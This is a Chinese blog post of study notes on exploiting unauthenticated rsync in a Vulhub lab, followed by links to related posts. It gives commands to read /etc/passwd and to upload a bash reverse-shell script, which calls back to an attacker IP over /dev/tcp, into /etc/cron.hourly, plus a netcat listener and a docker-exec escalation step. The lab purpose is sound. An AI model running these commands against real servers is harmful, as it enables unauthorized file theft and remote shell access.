rsync未授权访问漏洞 之 学习笔记

最新推荐文章于 2024-08-05 18:57:21 发布
最新推荐文章于 2024-08-05 18:57:21 发布
阅读量471 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qlqlulu/article/details/113482211
版权
本文介绍了如何在Kali 2020中安装Docker,并利用Docker搭建Vulhub靶场进行漏洞利用实践。详细步骤包括:安装Docker,通过rsync命令读取、下载文件,反弹shell,以及本地提权。通过这种方式,读者可以学习到漏洞利用和安全测试的基本技巧。
摘要由CSDN通过智能技术生成

kali2020安装docker搭建vulhua靶场
https://blog.csdn.net/u013536897/article/details/108543251
漏洞利用
连接

rsync rsync://127.0.0.1:873/

读取文件

rsync rsync://127.0.0.1:873/src/

下载文件
下载/etc/passwd
在这里插入图片描述任意文件下载
命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径

rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/

在这里插入图片描述反弹shell
下载crontab配置文件 rsync rsync://192.168.2.85:873/src/etc/crontab ./ 该环境crontab中

17 * * * * root cd / && run-parts --report /etc/cron.hourly

表示每小时的第17分钟执行run-parts --report /etc/cron.hourly
在这里插入图片描述创建一个文件输入shell脚本

#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.0.157/9999 0>&i

给它设置777权限
然后将它上传进去

rsync -av nc rsync://127.0.0.1:873/src/etc/cron.hourly

也可以使用这种上传rsync://192.168.2.85:873/src/var/spool/cron/crontabs/当前用户

在这里插入图片描述
最后使用kali监听本地接口

nc -lvnp 9999

在这里插入图片描述
静等第十七分钟运行我们上传的shell脚本
有个本地提权方法,但只适用本地靶场(本地)
查看docker容器

docker ps

提权

sudo docker exec -it a6cb5e784225 bash

在这里插入图片描述

Abc_Kimball
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rsync + inotify实时同步项目详细笔记实战案例
07-02
本文档记录了使用 rsync 和 inotify 实现实时同步项目的详细笔记实战案例。rsync 是一个功能强大的文件同步工具,而 inotify 是一种 Linux 内核提供的文件系统事件侦听机制。通过将这两种技术结合使用,可以实现实时...
每日漏洞 | rsync授权访问
03-12 3874
每日漏洞 | rsync授权访问
rsync 授权访问漏洞
weixin_59086772的博客
12-28 7475
雨笋教育小编来分享干货了,感兴趣的可以一同探讨。 0x00前言 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 0x01漏洞原理 rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 0x02漏洞危害 rsync授权访问会造成严重的信息泄露,攻击者可以上传脚本后门文件,远程命令执行。 0x03环境搭建 docker-compose.yml version: '2' s
Rsync授权访问漏洞 *
最新发布
starhei.zxy的博客
08-05 316
是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为。中搜索该资产语法如下并在Vulhub中开启靶场!且默认配置文件路径在。
授权访问Rsync 授权访问漏洞
qq_68163788的博客
05-16 931
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。 Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
rsync授权访问
m0_65150886的博客
01-16 701
rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可授权访问rsync,上传本地文件,下载服务器文件。3.根据文件信息,可以看到src是文件根目录,可以下载任意文件,此处下载/etc/passwd到当前目录。2.权限控制,设置read only=yes,模块设置为只读;10.将shell.sh上传至/tmp/shell.sh。4.模块隐藏,设置list,将模块隐藏起来。查看src模块下的文件。
rsync授权访问漏洞利用复现
技术超强的网络安全平台
05-07 1243
一、Rsync简介Rsync是Linux下一款数据备份工具,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。同时支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,而rsync默认是root权限,我们将可以读写目标服务器文件。二、利用条件rsync默认允许匿名访问,也可在其配置文件中为同
Linux实践工程师学习笔记.docx
11-20
这篇文档是关于Linux实践工程师的学习笔记,主要包括了用户环境配置、硬件检测、系统服务管理以及一些常用系统管理命令。下面将详细阐述这些知识点。 1. **用户环境**: - `locale` 命令用于查看当前系统的语言...
rsync备份重点简单总结详细笔记实战案例
07-02
rsync 备份重点简单总结详细笔记实战案例 rsync 是一个功能强大且灵活的备份工具,常用于远程同步备份数据。下面是 rsync 备份的重点和简单总结: 1. rsync 服务端和客户端: rsync 服务端需要开启 rsync 服务和 ...
rsync备份项目详细笔记实战案例
07-02
"rsync备份项目详细笔记实战案例" rsync 是一个功能强大的同步工具,广泛应用于数据备份、迁移和同步领域。下面将详细介绍 rsync 的使用方法和实战案例。 rsync 的备份机制 rsync 的备份机制是基于差异备份的,即...
sersync+rsync实时同步项目详细笔记文档实战案例
07-02
Sersync+Rsync实时同步项目详细笔记文档实战案例 Sersync+Rsync实时同步项目是基于SersyncRsync的实时同步解决方案,该解决方案能够实时同步数据,确保数据的一致性和可靠性。本项目的主要目的是通过Sersync...
rsync授权访问漏洞
Kevin's Blog
08-06 3345
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)四、修复建议 一、漏洞介绍 二、漏洞环境 三、漏洞利用 3.1 漏洞探测 》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口 》》列出目标服务器目录:(两个方法皆可) 》》查看目录中的文件,如能查看说明存在授权访问漏洞 或者 rsync rsync://<ip>:<port>/src 3.2 漏洞利用(下载任意文件
服务安全-应用协议rsync授权&ssh漏洞复现
rumil的博客
10-16 1396
libssh是一个在客户端和服务器端实现SSHv2协议的多平台C库。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配 置ACL或访问密码,我们将可以读写目标服务器文件。OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令。rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。
网络中授权访问漏洞Rsync,PhpInfo)
weixin_45840241的博客
07-03 969
Rsync授权访问漏洞是指Rsync服务配置不当或存在漏洞,导致攻击者可以授权访问和操作Rsync服务。Rsync是一个用于文件同步和传输的开源工具,通常在Unix/Linux系统上使用。当Rsync服务经正确配置时,攻击者可以利用该漏洞获取敏感文件、执行恶意操作,甚至对系统进行破坏。这种漏洞通常出现在以下情况下。
Rsync授权访问 getshell——漏洞复现
W小哥
11-09 3757
一、 Rsync授权访问漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
Rsync授权访问-vulfocus
c0529的博客
06-23 688
Rsync是linux上文件传输的协议,如果有返回直接可以看到,部分主机使用协议的时候不会加密码,就容易造成授权访问漏洞
漏洞复现-rsync-授权访问】vulfocus/rsync-common
10-16 1346
rsync-授权访问
第105天:权限提升-Linux系统&Docker挂载&Rsync授权&Sudo-CVE&Polkit-CVE
qq_46081990的博客
06-22 387
【代码】第105天:权限提升-Linux系统&Docker挂载&Rsync授权&Sudo-CVE&Polkit-CVE。
常见IT系统授权漏洞风险与Redis示例
本文主要探讨了多个常见的授权访问漏洞,涉及的IT服务和组件包括Redis、MongoDB、Jenkins、Memcached、JBOSS、VNC、Docker、ZooKeeper、Rsync、Atlassian Crowd、CouchDB、Elasticsearch和Hadoop。这些漏洞的共同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值